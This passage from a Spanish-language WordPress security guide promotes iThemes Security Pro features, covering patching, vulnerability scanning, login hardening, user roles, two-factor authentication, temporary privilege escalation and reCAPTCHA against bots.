Patch Tuesday es el término no oficial para referirse a los errores habituales y las correcciones de seguridad que Microsoft publica el segundo martes de cada mes. Es fantástico que Microsoft publique correcciones de seguridad con una cadencia tan confiable. El martes de parches también es el día en que se divulgan públicamente las vulnerabilidades de seguridad que parchea Microsoft.

Consulte la sección Qué actualizar y cómo automatizar sus actualizaciones del libro electrónico La guía definitiva para la seguridad de WordPress en 2020 para aprender cómo aplicar las actualizaciones de Patch Tuesday automáticamente.

Explotar miércoles

El miércoles siguiente al martes de parches, es común ver a muchos atacantes explotar una vulnerabilidad previamente conocida en sistemas desactualizados y sin parches. Entonces, el miércoles siguiente a un Patch Tuesday se ha acuñado extraoficialmente como Exploit Wednesday.

¿Por qué los piratas informáticos se dirigen a vulnerabilidades parcheadas?

Los piratas informáticos apuntan a vulnerabilidades parcheadas porque saben que las personas no actualizan (incluidos complementos y temas en su sitio web). Es un estándar de la industria revelar públicamente las vulnerabilidades el día en que se reparan. Después de que una vulnerabilidad se divulga públicamente, la vulnerabilidad se convierte en una "vulnerabilidad conocida" para las versiones desactualizadas y sin parches del software. El software con vulnerabilidades conocidas es un objetivo fácil para los piratas informáticos.

A los piratas informáticos les gustan los objetivos fáciles, y tener software con vulnerabilidades conocidas es como darle a un pirata informático las instrucciones paso a paso para ingresar a su sitio web, servidor, computadora o cualquier otro dispositivo conectado a Internet de WordPress.

Divulgación responsable

Quizás se pregunte por qué se revelaría una vulnerabilidad si les da a los piratas informáticos un exploit para atacar. Bueno, es muy común que un investigador de seguridad encuentre e informe de forma privada la vulnerabilidad al desarrollador de software.

Con la divulgación responsable, el informe inicial del investigador se realiza de forma privada a los desarrolladores de la empresa propietaria del software, pero con el acuerdo de que los detalles completos se publicarán una vez que se haya puesto a disposición un parche. En el caso de vulnerabilidades de seguridad importantes, puede haber un ligero retraso en la divulgación de la vulnerabilidad para que más personas tengan tiempo de parchear.

El investigador de seguridad puede proporcionar una fecha límite para que el desarrollador de software responda al informe o proporcione un parche. Si no se cumple este plazo, el investigador puede revelar públicamente la vulnerabilidad para presionar al desarrollador para que emita un parche.

Revelar públicamente una vulnerabilidad y, aparentemente, introducir un Día Cero, un tipo de vulnerabilidad que no tiene parche y está siendo explotado en la naturaleza, puede parecer contraproducente. Pero es la única ventaja que tiene un investigador para presionar al desarrollador para que parchee la vulnerabilidad.

Si un pirata informático descubriera la vulnerabilidad, podría usar el Exploit silenciosamente y causar daño al usuario final (este es usted), mientras que el desarrollador de software sigue contento con dejar la vulnerabilidad sin parchear.

Project Zero de Google tiene pautas similares cuando se trata de revelar vulnerabilidades. Publican los detalles completos de la vulnerabilidad después de 90 días, independientemente de que se haya parcheado o no.

Aprender a actualizar: el camino difícil

A fines de 2018, los piratas informáticos se aprovechaban activamente de un exploit en el complemento WP GDPR Compliance. El Exploit permitía a los usuarios no autorizados (personas que no habían iniciado sesión en un sitio web) modificar la configuración de registro de usuarios de WP y cambiar la nueva función de usuario predeterminada de suscriptor a administrador. Afortunadamente, los desarrolladores del complemento WP GDPR Compliance actuaron rápido y lanzaron un parche para la vulnerabilidad el día después de su divulgación pública.

Pero, al igual que con Exploit Wednesday, los piratas informáticos atacaron la vulnerabilidad a pesar de que se había lanzado un parche. En los días y semanas posteriores al divulgador de vulnerabilidades de WP GDPR Compliance, recibimos una serie de informes de que los sitios web de WordPress fueron pirateados por atacantes que explotaban la vulnerabilidad.

Tener un complemento o tema vulnerable para el que hay un parche disponible pero no se aplica es el principal culpable de los sitios web de WordPress pirateados. ESTO ES TAN FRUSTRANTE !!!!! Esto significa que la mayoría de los hackeos de WP podrían haberse evitado.

Es molesto pensar en todas las personas que gastaron toneladas de dinero para limpiar su sitio web, los ingresos que perdieron mientras sus sitios estaban inactivos y los ingresos futuros que perdieron al perder la confianza de sus clientes. Lo hace aún más molesto cuando sabes que toda esa angustia podría haberse evitado con una simple actualización.

La función iThemes Security Pro Version Management permite personalizar y automatizar sus actualizaciones de WordPress.

4. Realice un seguimiento de las vulnerabilidades de WordPress

Mantener sus complementos y temas actualizados no lo protegerá de todas las vulnerabilidades de WordPress. Los desarrolladores que los crearon han abandonado algunos complementos y temas de WordPress.

Desafortunadamente, si un complemento o tema abandonado tiene una vulnerabilidad, nunca recibirá un parche. Los piratas informáticos apuntarán a sitios web que utilizan estos complementos ahora vulnerables de forma permanente.

Si tiene un complemento abandonado con una vulnerabilidad conocida en su sitio web, le está dando a los piratas informáticos los planos que necesitan para hacerse cargo de su sitio web. Es por eso que debe realizar un seguimiento de las últimas vulnerabilidades.

Es difícil hacer un seguimiento de cada vulnerabilidad de WordPress revelada y comparar esa lista con las versiones de complementos y temas que ha instalado en su sitio web. Hacer un seguimiento de las vulnerabilidades es la diferencia entre tener un sitio web seguro y uno que los piratas informáticos puedan aprovechar fácilmente.

¡Buenas noticias para usted! Realizamos un seguimiento y compartimos todas las vulnerabilidades reveladas en nuestros Resumen de vulnerabilidades de WordPress.

5. Escanee su sitio web en busca de vulnerabilidades

Una forma más rápida de proteger su sitio web de las vulnerabilidades de los piratas informáticos es utilizar escaneos automatizados para verificar sus sitios web en busca de vulnerabilidades conocidas.

IThemes Security Pro Site Scanner es su forma de automatizar la protección contra vulnerabilidades en todos sus sitios web de WordPress. Site Scanner comprueba su sitio en busca de vulnerabilidades conocidas y aplicará automáticamente un parche si hay alguno disponible.

El sitio iThemes Security Pro busca 3 tipos de vulnerabilidades.

1. Vulnerabilidades de WordPress
2. Vulnerabilidades de complementos
3. Vulnerabilidades del tema

La función de auditoría del sitio de iThemes Sync Pro aprovecha el poder de Google Lighthouse para proteger su sitio web. Site Audit comprueba y marca las páginas que incluyen bibliotecas de JavaScript de front-end con vulnerabilidades de seguridad conocidas.

Es una práctica común que los desarrolladores utilicen código de terceros, como bibliotecas JS, en sus complementos y temas. Desafortunadamente, si las bibliotecas no se mantienen adecuadamente, pueden crear vulnerabilidades que los atacantes pueden aprovechar para piratear su sitio web. El uso de componentes con vulnerabilidades conocidas está en la lista de los 10 principales de OWASP.

¡La auditoría del sitio me salvó el tocino! Creé un programa de auditoría para que Sync Pro realizara auditorías automatizadas semanales y me envíe los informes de auditoría por correo electrónico. Mantengo todo actualizado, y es por eso que me sorprendió cuando vi en una de las auditorías de mi sitio web que estaba usando bibliotecas de JavaScript con vulnerabilidades de seguridad conocidas.

¡El informe me señaló una versión desactualizada de jQuery en el directorio de WordPress del sitio web plagado de vulnerabilidades conocidas! Por suerte para mí, vi en mi Sync Pro Site Audit que estaba usando bibliotecas de JavaScript con vulnerabilidades de seguridad conocidas y pude resolver el problema antes de que mi sitio web fuera pirateado.

Terminando

La administración adecuada del software que hace que su sitio web funcione, incluidos los complementos, temas y el núcleo de WordPress, contribuirá en gran medida a su estrategia de seguridad de WordPress, asegurando su sitio web contra atacantes en línea.

Sección 6: Asegurar su inicio de sesión de WordPress

La URL de inicio de sesión de WordPress es la misma para todos los sitios de WordPress y no requiere ningún permiso especial para acceder. Cualquiera con experiencia trabajando con WordPress sabe que la URL de inicio de sesión se encuentra en la página /wp-login.php .

La accesibilidad de la página de inicio de sesión de WordPress la convierte en la parte más atacada, y potencialmente la más vulnerable, de cualquier sitio web de WordPress. Afortunadamente para nosotros, el complemento iThemes Security Pro facilita la seguridad de su inicio de sesión de WordPress.

¡Echemos un vistazo a las herramientas en iThemes Security Pro que puede usar para asegurar su inicio de sesión de WordPress y hacerlo casi impenetrable!

1. Limite los intentos de inicio de sesión

El primer paso para asegurar su inicio de sesión de WordPress es limitar los intentos fallidos de inicio de sesión. De forma predeterminada, no hay nada integrado en WordPress para limitar la cantidad de intentos fallidos de inicio de sesión que alguien puede realizar. Sin un límite en el número de intentos fallidos de inicio de sesión que puede realizar un atacante, puede seguir probando una combinación de diferentes nombres de usuario y contraseñas hasta que encuentren uno que funcione.

La función iThemes Security Pro Local Brute Force Protection realiza un seguimiento de los intentos de inicio de sesión no válidos realizados por un host o una dirección IP y un nombre de usuario. Una vez que una IP o nombre de usuario ha realizado demasiados intentos consecutivos de inicio de sesión no válidos, se bloqueará y se evitará que realice más intentos durante un período de tiempo determinado.

Para comenzar a usar la función de Protección local de fuerza bruta , habilítela en la página principal de la página de configuración de iThemes Security Pro.

La configuración de Protección local contra fuerza bruta le permite establecer los umbrales para los bloqueos.

• Intentos de inicio de sesión máximos por host : el número de intentos de inicio de sesión no válidos que se permite una IP antes de que se bloquee.
• Intentos de inicio de sesión máximos por usuario : este es el número de intentos de inicio de sesión no válidos que se permite a un nombre de usuario antes de que se bloquee.
• Minutos para recordar un inicio de sesión incorrecto : este es el tiempo que debe contar un intento de inicio de sesión no válido contra una IP o nombre de usuario para un bloqueo.
• Prohibir automáticamente al usuario "administrador" : cuando está habilitado, cualquier persona que use el nombre de usuario de administrador al iniciar sesión recibe un bloqueo automático.

Hay un par de cosas que debe tener en cuenta al configurar sus ajustes de bloqueo. Desea dar a los usuarios intentos de inicio de sesión no válidos de movimiento que los que les da a las direcciones IP. Digamos que su sitio web está bajo un ataque de fuerza bruta y el atacante está usando su nombre de usuario. El objetivo es bloquear la IP del atacante y no su nombre de usuario, por lo que aún podrá iniciar sesión y realizar el trabajo, incluso cuando su sitio web esté siendo atacado.

Tampoco desea que esta configuración sea demasiado estricta estableciendo el número de intentos de inicio de sesión no válidos demasiado bajo y el tiempo para recordar los intentos no válidos demasiado tiempo. Si reduce el número de intentos de inicio de sesión no válidos para hosts / IP a 1 y establece los minutos para recordar un intento de inicio de sesión incorrecto en un mes, aumenta drásticamente la probabilidad de bloquear inadvertidamente a usuarios legítimos.

2. Limite los intentos de autenticación externa por solicitud

Hay otras formas de iniciar sesión en WordPress además de usar un formulario de inicio de sesión. Con XML-RPC, un atacante puede realizar cientos de intentos de nombres de usuario y contraseñas en una sola solicitud HTTP. El método de amplificación de fuerza bruta permite a los atacantes realizar miles de intentos de nombre de usuario y contraseña utilizando XML-RPC en solo unas pocas solicitudes HTTP.

Con la configuración de ajustes de WordPress de iThemes Security Pro, puede bloquear varios intentos de autenticación por solicitud XML-RPC. Limitar el número de intentos de nombre de usuario y contraseña a uno por cada solicitud contribuirá en gran medida a asegurar su inicio de sesión de WordPress.

3. Protección de la fuerza bruta de la red

Limitar los intentos de inicio de sesión tiene que ver con la protección local contra la fuerza bruta. La protección de fuerza bruta local solo analiza los intentos de acceder a su sitio y prohíbe a los usuarios según las reglas de bloqueo especificadas en su configuración de seguridad.

La protección de Red Brute Force lleva esto un paso más allá. La red es la comunidad de iThemes Security y tiene más de un millón de sitios web. Si se identifica una IP que intenta ingresar a sitios web en la comunidad de iThemes Security, la IP se agregará a la lista de prohibidos de Network Bruce Force.

Una vez que una IP está en la lista prohibida de Network Brute Force, la IP se bloqueará en todos los sitios web de la red. Por lo tanto, si una IP ataca mi sitio web y es prohibida, se informará a iThemes Security Brute Force Network. Mi informe puede ayudar a prohibir la IP en toda la red. Me encanta poder ayudar a asegurar el inicio de sesión de WordPress de otras personas simplemente habilitando iThemes Security Network Protection.

Para comenzar a usar Network Force Protection , habilítelo en la página principal de la configuración de seguridad.

Luego ingrese su dirección de correo electrónico, elija si desea o no recibir actualizaciones por correo electrónico y luego haga clic en el botón Guardar .

4. Limite el acceso del dispositivo al panel de WP

El último paso para asegurar su inicio de sesión de WordPress es limitar el acceso a su panel de WordPress a un conjunto de dispositivos. La función de dispositivos de confianza de iThemes Security Pro identifica los dispositivos que usted y otros usuarios utilizan para iniciar sesión en su sitio de WordPress. Cuando un usuario ha iniciado sesión en un dispositivo no reconocido, Trusted Devices puede restringir sus capacidades de nivel de administrador. Esto significa que un pirata informático pudo eludir sus otros métodos de seguridad de inicio de sesión (no es muy probable) y no podría realizar ningún cambio malicioso en su sitio web.

Para comenzar a usar dispositivos de confianza , habilítelos en la página principal de la configuración de seguridad y luego haga clic en el botón Configurar configuraciones .

En la configuración de Dispositivos confiables, decida qué usuarios desea usar la función y habilite las funciones Restringir capacidades y Protección contra el secuestro de sesiones .

Después de habilitar la nueva configuración de Dispositivos confiables, los usuarios recibirán una notificación en la barra de administración de WordPress sobre dispositivos pendientes no reconocidos. Si su dispositivo actual no se ha agregado a la lista de dispositivos de confianza, haga clic en el enlace Confirmar este dispositivo para enviar el correo electrónico de autorización .

Haga clic en el botón Confirmar dispositivo en el correo electrónico de inicio de sesión no reconocido para agregar sus dispositivos actuales a la lista Dispositivos confiables.

Terminando

La accesibilidad de la página de inicio de sesión de WordPress la convierte en la parte más atacada y potencialmente vulnerable de cualquier sitio de WordPress. Sin embargo, seguir los pasos de esta sección hará que su inicio de sesión de WordPress sea casi impenetrable.

Sección 7: Asegurar a sus usuarios de WordPress

Siempre que hablamos de seguridad del usuario, a menudo escuchamos preguntas como, ¿todos los usuarios de WordPress deberían tener los mismos requisitos de seguridad y cuánta seguridad es demasiada seguridad?

No te preocupes. Respondemos a todas estas preguntas. Pero primero, hablemos de los diferentes tipos de usuarios de WordPress.

¿Cuáles son los diferentes tipos de usuarios de WordPress?

Hay 5 usuarios de WordPress predeterminados diferentes.

1. Administrador
2. Editor
3. Autor
4. Contribuyente
5. Abonado

Cada usuario tiene diferentes capacidades. Las capacidades dictan lo que pueden hacer una vez que acceden al tablero. Lea más sobre los roles y permisos de usuario de WordPress.

El daño potencial de diferentes usuarios de WordPress pirateados

Antes de que podamos entender cómo proteger a nuestros usuarios de WordPress, primero debemos comprender el nivel de amenaza de cada tipo de usuario comprometido. El tipo y nivel de daño que un atacante puede infligir varía mucho según los roles y las capacidades del usuario al que piratea.

Administrador - Nivel de amenaza alto

Los usuarios administradores tienen las capacidades para lo que quieran.

• Cree, elimine y modifique usuarios.
• Instale, elimine y edite complementos y temas.
• Cree, elimine y edite todas las publicaciones y páginas.
• Publica y anula la publicación de publicaciones y páginas.
• Agregue y elimine medios.

Si un pirata informático puede poner sus manos en uno de los administradores de su sitio, podría retener su sitio web para pedir un rescate. Como mencionamos anteriormente, Ransomware se refiere a cuando un pirata informático se apodera de su sitio web y no se lo devolverá a menos que le pague una tarifa considerable.

Editor - Nivel de amenaza alto

El editor gestiona todo el contenido del sitio web. Estos usuarios todavía tienen bastante poder.

• Cree, elimine y edite todas las publicaciones y páginas.
• Publique y anule la publicación de todas las publicaciones y páginas.
• Sube archivos multimedia.
• Administra todos los enlaces.
• Gestionar comentarios.
• Administrar categorías.

Si un atacante tomó el control de la cuenta de un editor, podría modificar una de sus páginas para usarla en un ataque de phishing. El phishing es un tipo de ataque que se utiliza para robar datos del usuario, incluidas las credenciales de inicio de sesión y los números de tarjetas de crédito.

El phishing es una de las formas más seguras de hacer que tu sitio web sea incluido en la lista negra de Google. Cada día, 10,000 sitios ingresan a la lista de bloqueo de Google por varias razones.

Autor - Nivel de amenaza Medio

El autor fue diseñado para crear y administrar su propio contenido.

• Cree, elimine y edite sus propias publicaciones y páginas.
• Publicar y anular la publicación de sus propias publicaciones.
• Subir archivos multimedia

Si un atacante obtuviera el control de la cuenta de un autor, podría crear páginas y publicaciones que enviaran a los visitantes de su sitio a sitios web maliciosos.

Colaborador y suscriptor: nivel de amenaza bajo

El Colaborador es la versión básica del rol de usuario Autor. No tienen poder de publicación.

• Crea y edita sus propias publicaciones.
• Eliminar sus propias publicaciones no publicadas.

El suscriptor puede leer las cosas que publican los demás usuarios.

Si bien los piratas informáticos con un rol de Colaborador o Suscriptor no pueden realizar cambios maliciosos, pueden robar cualquier información confidencial almacenada en la cuenta o la página de perfil del usuario.

6 consejos para proteger a sus usuarios de WordPress

De acuerdo, esas son algunas cosas bastante desagradables que los piratas informáticos pueden hacer en nuestros sitios web. La buena noticia es que la mayoría de los ataques a sus cuentas de usuario de WordPress se pueden prevenir con un pequeño esfuerzo de su parte.

Echemos un vistazo a las cosas que puede hacer para proteger a sus usuarios de WordPress. La verdad es que estos métodos de seguridad de WordPress ayudarán a proteger a todo tipo de usuario de WordPress. Pero, a medida que revisemos cada uno de los métodos, le haremos saber qué usuarios necesita para usar el método.

1. Solo brinde a las personas las capacidades que necesitan

La forma más fácil de proteger su sitio web es dándoles a sus usuarios las capacidades que necesitan y nada más. Si lo único que alguien va a hacer en su sitio web es crear y editar sus propias publicaciones de blog, no necesita la capacidad de editar las publicaciones de otras personas.

2. Proteja a los usuarios de WordPress con contraseñas seguras

En una lista compilada por Splash Data, la contraseña más común incluida en todos los volcados de datos fue 123456. Un volcado de datos es una base de datos pirateada llena de contraseñas de usuario vertidas en algún lugar de Internet. ¿Te imaginas cuántas personas en tu sitio web usan una contraseña débil si 123456 es la contraseña más común en los volcados de datos?

Usar una contraseña débil es como intentar cerrar la puerta de su casa con un trozo de cinta adhesiva. Los piratas informáticos nunca han tardado mucho en abrirse paso a la fuerza para pasar una contraseña débil en un sitio web. Ahora que los piratas informáticos aprovechan las tarjetas gráficas de computadora en sus ataques, el tiempo que lleva descifrar una contraseña nunca ha sido menor.

Por ejemplo, echemos un vistazo a un gráfico creado por Terahash, una empresa de descifrado de contraseñas de alto rendimiento. Su gráfico muestra el tiempo que lleva descifrar una contraseña utilizando un grupo de hashstack de 448x RTX 2080.

De forma predeterminada, WordPress usa MD5 para codificar las contraseñas de los usuarios almacenadas en la base de datos de WP. Entonces, de acuerdo con esta tabla, Terahash podría descifrar una contraseña de 8 caracteres ... casi instantáneamente. Eso no solo es súper impresionante, sino que también da mucho miedo. La buena noticia es que podemos asegurar nuestro inicio de sesión de WordPress requiriendo que nuestros usuarios de alto nivel utilicen contraseñas seguras.

La función Requisito de contraseñas de iThemes Security Pro le permite obligar a usuarios específicos a utilizar una contraseña segura . Habilite la función Requisitos de contraseña en la página principal de la configuración de seguridad y luego seleccione los usuarios a los que desea solicitar que utilicen una contraseña segura.

3. Contraseñas comprometidas rechazadas

Según el Informe de Investigaciones de Violación de Datos de Verizon, más del 70% de los empleados reutilizan las contraseñas en el trabajo. Pero la estadística más importante del informe es que el 81% de las infracciones relacionadas con la piratería aprovecharon contraseñas robadas o débiles.

Los piratas informáticos utilizan una forma de ataque de fuerza bruta llamada ataque de diccionario. Un ataque de diccionario es un método para irrumpir en un sitio web de WordPress con contraseñas de uso común que han aparecido en volcados de bases de datos. La “Colección # 1? La violación de datos alojada en MEGA incluyó 1,160,253,228 combinaciones únicas de direcciones de correo electrónico y contraseñas. Eso es mil millones con una b. Ese tipo de puntuación realmente ayudará a un ataque de diccionario a reducir las contraseñas de WordPress más utilizadas.

Es imprescindible evitar que los usuarios con capacidades de autor y superiores utilicen contraseñas comprometidas para proteger su inicio de sesión de WordPress. También puede pensar en no permitir que sus usuarios de nivel inferior utilicen contraseñas comprometidas.

Es completamente comprensible y se recomienda hacer que la creación de una nueva cuenta de cliente sea lo más fácil posible. Sin embargo, es posible que su cliente no sepa que la contraseña que está utilizando se ha encontrado en un volcado de datos. Le estaría haciendo un gran servicio a su cliente al alertarlo del hecho de que la contraseña que está usando se ha visto comprometida. Si usan esa contraseña en todas partes, podría salvarlos de algunos dolores de cabeza importantes en el futuro.

La función de rechazo de contraseñas comprometidas de iThemes Security Pro obliga a los usuarios a utilizar contraseñas que no han aparecido en ninguna infracción de contraseña rastreada por Have I Been Pwned. Habilite la función Requisitos de contraseña en la página principal de la configuración de seguridad y luego seleccione los usuarios que desea evitar que usen una contraseña comprometida.

4. Proteja a los usuarios de WordPress con autenticación de dos factores

Usar autenticaciones de dos factores es lo mejor que puede hacer para asegurar su inicio de sesión de WordPress. La autenticación de dos factores es un proceso de verificación de la identidad de una persona que requiere dos métodos de verificación separados. Google compartió en su blog que el uso de la autenticación de dos factores puede detener el 100% de los ataques de bots automatizados. Realmente me gustan esas probabilidades.

La función de autenticación de dos factores de iThemes Security Pro proporciona una gran flexibilidad al implementar 2fa en su sitio web. Puede habilitar dos factores para todos o algunos de sus usuarios, y puede obligar a sus usuarios de alto nivel a usar 2fa en cada inicio de sesión.

Para su comodidad, iThemes Security Pro ofrece 2 métodos diferentes de autenticación de dos factores.

1. Aplicación móvil: el método de aplicación móvil es el método más seguro de autenticación de dos factores proporcionado por iThemes Security Pro. Este método requiere que uses una aplicación móvil gratuita de dos factores como Authy.
2. Correo electrónico: el método de correo electrónico de dos factores enviará códigos sensibles al tiempo a la dirección de correo electrónico de su usuario.
3. Códigos de respaldo : un conjunto de códigos de uso único que se pueden usar para iniciar sesión en caso de que se pierda el método principal de dos factores.

5. Proteger a los usuarios de WordPress del secuestro de sesiones

WordPress genera una cookie de sesión cada vez que inicia sesión en su sitio web. Y digamos que tiene una extensión de navegador que el desarrollador ha abandonado y ya no publica actualizaciones de seguridad. Desafortunadamente para ti, la extensión del navegador desatendida tiene una vulnerabilidad. La vulnerabilidad permite a los delincuentes secuestrar las cookies de su navegador, incluida la cookie de sesión de WordPress mencionada anteriormente. Este tipo de pirateo se conoce como secuestro de sesión . Por lo tanto, un atacante puede aprovechar la vulnerabilidad de la extensión para aprovechar su inicio de sesión y comenzar a realizar cambios maliciosos con su usuario de WordPress.

Debe tener una protección contra el secuestro de sesiones para sus administradores y editores.

La función de dispositivos de confianza de iThemes Security Pro hace que el secuestro de sesiones sea cosa del pasado. Si el dispositivo de un usuario cambia durante una sesión, iThemes Security cerrará automáticamente la sesión del usuario para evitar cualquier actividad no autorizada en la cuenta del usuario, como cambiar la dirección de correo electrónico del usuario o cargar complementos maliciosos.

6. Cree un usuario de soporte universal

Cada vez que crea un nuevo usuario, está agregando otro punto de entrada que un pirata informático podría explotar. Pero es probable que en ocasiones necesite ayuda externa para su sitio web, como cuando busca ayuda o después de contratar a un contratista independiente. Necesita una forma segura de agregar acceso de administrador temporal a su sitio web.

Por ejemplo, digamos que tiene algunos problemas con uno de los complementos instalados en su sitio web. Después de ponerse en contacto con el servicio de asistencia, solicitan acceso de administrador a su sitio web para que puedan echar un vistazo más de cerca. Parece una solicitud perfectamente razonable y decide otorgarles acceso.

Entonces, ¿cómo le damos a alguien acceso de administrador temporal a nuestro sitio web de WordPress?

Otorgar acceso externo a su sitio web: las dos opciones

Normalmente, tiene dos opciones para proporcionar acceso externo a su sitio web…. y tampoco son geniales .

1. Comparta las credenciales de su usuario

Su primera y peor opción es compartir el nombre de usuario y la contraseña de su usuario administrador de WordPress.

Por qué es terrible compartir sus credenciales de administrador

• Seguridad reducida : si comparte las credenciales de su usuario, tendrá que deshabilitar la autenticación de dos factores para permitir que la persona que usa sus credenciales inicie sesión. Google compartió en su blog que el uso de la autenticación de dos factores o la verificación de dos pasos puede detener el 100% de los ataques de bots automatizados. Deshabilitar la autenticación de dos factores, incluso por un período corto de tiempo, reduce drásticamente la seguridad de su sitio web.
• Inconveniente : compartir sus credenciales requiere que cambie su contraseña. Si olvida cambiar su contraseña, hay una o más personas que tienen acceso de administrador a su sitio web cuando lo deseen.

2. Crear un nuevo usuario para el técnico de soporte

Si bien crear un nuevo usuario administrador para el especialista en soporte es mejor que compartir sus credenciales de administrador, todavía no es genial.

Por qué es terrible crear un usuario para la tecnología de soporte

• Mayor vulnerabilidad : la creación de un nuevo usuario administrador agrega otro punto de entrada que podría explotarse. Si no tiene una política de contraseñas, el técnico de soporte podría elegir una contraseña débil, haciendo que su inicio de sesión de WordPress sea más vulnerable a los ataques.
• Inconveniente : pasar por el proceso de configuración de un nuevo usuario cada vez que necesite ayuda externa requiere mucho tiempo. Debe crear el nuevo usuario y luego recordar eliminar al usuario cuando ya no necesite acceder a su sitio web. Una de las mejores prácticas de seguridad de WordPress es eliminar a cualquier usuario no utilizado de su sitio web.

¿Qué es la ampliación de privilegios?

La función de escalamiento de privilegios de iThemes Security Pro le permite otorgar a un usuario capacidades adicionales temporalmente.

Privilege Escalation hace que sea fácil y seguro crear un usuario universal que puede brindar a cualquier desarrollador externo o técnico de soporte que necesite acceso temporal a su sitio web.

Con Privilege Escalation, puede crear un nuevo usuario y nombrarlo Soporte y darle el rol de usuario Suscriptor. La próxima vez que necesite proporcionar acceso temporal a su sitio web, puede pasar al usuario de Soporte de un suscriptor a un administrador. Veremos cómo hacer esto más adelante en la publicación, pero primero, hablemos de por qué Privilege Escalation es una mejor manera de otorgar acceso a su sitio web.

Por qué la ampliación de privilegios es mejor

• Fácil : no tiene que crear un nuevo usuario cada vez que necesite otorgar acceso a su sitio web.
• Automático : la escalada de privilegios solo dura 24 horas. Una vez transcurridas las 24 horas, el usuario pierde automáticamente todos los privilegios adicionales. No es necesario que recuerde eliminar usuarios o cambiar las contraseñas.
• Sin sacrificios en seguridad : aún puede requerir que este usuario de soporte universal use el método de correo electrónico de dos factores para iniciar sesión, lo que significa que tiene el mismo nivel de seguridad que tiene con sus otros usuarios administradores. Debido a que el rol de usuario real es un suscriptor, no corre ningún riesgo real de dejarlo en su sitio web.

Cómo utilizar la ampliación de privilegios en iThemes Security Pro

Para comenzar, habilite Privilege Escalation en la página principal de la configuración de seguridad.

Puede crear un nuevo usuario y nombrarlo Soporte y darle el rol de usuario Suscriptor. La próxima vez que necesite proporcionar acceso temporal a su sitio web, navegue a la página de perfil de su usuario de Soporte.

Actualice la dirección de correo electrónico para permitir que la persona de soporte externa solicite una nueva contraseña. Luego, desplácese hacia abajo hasta que vea la configuración de Escalada temporal de privilegios. Haga clic en la palanca Establecer función temporal y seleccione Administrador. El usuario ahora tendrá acceso de administrador durante las próximas 24 horas.

Si no necesitan las 24 horas completas, puede revocar la escalada de privilegios desde la página de perfil de usuario. Si necesita más de 24 horas, puede establecer el número exacto de días que necesita en el campo Días .

Terminando

La popularidad de WordPress lo convierte en un objetivo para los piratas informáticos de todo el mundo. Como comentamos, un atacante puede causar daños pirateando incluso el nivel más bajo de usuario de WordPress.

La buena noticia es que, si bien no hay forma de evitar los ataques a sus usuarios de WordPress, con un poco de esfuerzo de nuestra parte, podemos evitar que los ataques tengan éxito.

Sección 8: Proteja su sitio web de los robots maliciosos

En esta sección de la guía de seguridad de WordPress, aprenderá qué es un bot y cómo evitar que los bots dañinos causen estragos en su sitio web.

¿Qué es un bot?

Un bot es una pieza de software que está programada para realizar una lista específica de tareas. Los desarrolladores crean un conjunto de instrucciones que un bot seguirá automáticamente sin que el desarrollador tenga que decirles que empiecen. Los bots realizarán tareas repetitivas y mundanas mucho más rápido que nosotros.

Varios bots están rastreando continuamente su sitio web. Algunos de estos bots son buenos y le brindan un valioso servicio. Otros bots tienen motivos más nefastos. Tomemos un momento para hablar sobre qué es un bot y los diferentes tipos de bots.

Los buenos bots

Monitoreo de bots : iThemes Sync Pro Uptime Monitoring utiliza un bot para monitorear el tiempo de actividad de su sitio web. El bot revisa su sitio web cada 5 minutos para verificar que todavía está en línea. Si su sitio web no funciona, el bot le enviará una alerta para que pueda volver a ponerlo en línea.

Bots de auditoría : iThemes Sync Pro Site Audit utiliza un bot de Google Lighthouse para verificar la calidad de sus páginas web. Otro excelente ejemplo de un robot de auditoría es un verificador de enlaces roto que rastreará su sitio web en busca de enlaces que lo envíen a una ubicación que no existe.

Feeder Bots : un excelente ejemplo de un feeder bot es su reproductor de podcasts. Su reproductor de podcasts utiliza un bot para monitorear los canales RSS de los podcasts a los que se suscribe y le avisa cuando su podcast favorito lanza un nuevo episodio.

Bots de motor de búsqueda : un rastreador web de Google es un ejemplo de un robot de motor de búsqueda. Este tipo de bot rastreará su sitio web en busca de páginas nuevas o modificadas y creará un índice de su sitio web. Una vez que Google u otro motor de búsqueda tenga un índice de su sitio web, podrán compartir sus páginas con las personas que utilizan su motor de búsqueda.

Security Bots: iThemes Security Pro Site Scan utiliza un bot para comparar la lista de complementos y temas instalados con nuestra base de datos de vulnerabilidades. Si tiene un complemento o tema instalado con una vulnerabilidad conocida, el bot aplicará automáticamente un parche si hay alguno disponible.

Los Bad Bots

Content Scraping Bots : estos bots están programados para descargar el contenido de su sitio web sin su permiso. El bot puede duplicar el contenido para usarlo en el sitio web del atacante para mejorar su SEO y robar el tráfico de su sitio.

Spambots : los spambots son molestos. Ellos ensuciarán sus comentarios con promesas de convertirse en millonarios mientras trabajan desde casa con la esperanza de enviar a sus visitantes a sitios web maliciosos.

Brute Force Bots : los bots de Brute Force recorren Internet en busca de inicios de sesión de WordPress para atacar. Una vez que estos bots lleguen a una página de inicio de sesión, intentarán la forma más simple de obtener acceso a un sitio: tratando de adivinar nombres de usuario y contraseñas, una y otra vez, hasta que tengan éxito.

Cómo bloquear malos bots sin bloquear buenos bots: reCAPTCHA V3

Google reCAPTCHA ayuda a evitar que los robots maliciosos se involucren en actividades abusivas en su sitio web, como intentar ingresar a su sitio web usando contraseñas comprometidas, publicar spam o incluso raspar su contenido.

Sin embargo, los usuarios legítimos podrán iniciar sesión, realizar compras, ver páginas o crear cuentas. reCAPTCHA utiliza técnicas avanzadas de análisis de riesgos para diferenciar a los humanos de los robots.

La función Google reCAPTCHA en iThemes Security Pro protege su sitio de los robots maliciosos. Estos bots intentan ingresar a su sitio web utilizando contraseñas comprometidas, publicando spam o incluso raspando su contenido. reCAPTCHA utiliza técnicas avanzadas de análisis de riesgos para diferenciar a los humanos de los robots.

Lo bueno de la versión 3 de reCAPTCHA es que te ayuda a detectar tráfico de bots abusivo en tu sitio web sin la interacción del usuario. En lugar de mostrar un desafío CAPTCHA, reCAPTCHA v3 monitorea las diferentes solicitudes realizadas en su sitio y devuelve una puntuación para cada solicitud. El puntaje varía de 0.01 a 1. Cuanto mayor sea el puntaje devuelto por reCAPTCHA, más seguro es que un humano hizo la solicitud. Cuanto más baja sea esta puntuación devuelta por reCAPTCHA, más confianza habrá de que un bot haya realizado la solicitud.

iThemes Security Pro le permite establecer un umbral de bloqueo utilizando la puntuación reCAPTCHA. Google recomienda usar 0.5 como predeterminado. Tenga en cuenta que podría bloquear inadvertidamente a usuarios legítimos si establece el umbral demasiado alto.

